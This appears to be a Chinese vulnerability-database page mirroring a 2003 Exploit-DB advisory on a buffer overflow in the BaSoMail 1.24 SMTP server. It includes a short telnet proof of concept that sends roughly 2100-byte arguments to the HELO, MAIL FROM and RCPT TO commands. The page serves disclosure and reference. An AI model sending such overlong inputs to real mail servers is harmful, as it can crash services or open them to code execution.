BaSoMail 1.24 – SMTP Server Command Buffer Overflow

BaSoMail 1.24 – SMTP Server Command Buffer Overflow

漏洞ID 1053895 漏洞类型
发布时间 2003-05-28 更新时间 2003-05-28
图片[1]-BaSoMail 1.24 – SMTP Server Command Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-BaSoMail 1.24 – SMTP Server Command Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22668
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7726/info

BaSoMail SMTP Server has been reported prone to a buffer overflow vulnerability.

The issue is likely due to a lack of sufficient bounds checking performed on arguments passed to SMTP commands.

Although unconfirmed and speculative, due to the nature of this vulnerability, it may be possible to exploit this issue to execute arbitrary attacker supplied code. 

# Telnet The_SMTP_Server_IP_Address 25
220 Welcome to BaSoMail (www.BaSo.no)
HELO <ccccc....[Buffer size 2100 Bytes]>
Or
Mail From : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Or
Rcpt to : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Quit

相关推荐: Xoops WebChat Module Remote SQL Injection Vulnerability

Xoops WebChat Module Remote SQL Injection Vulnerability 漏洞ID 1101344 漏洞类型 Input Validation Error 发布时间 2002-11-12 更新时间 2002-11-12 C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享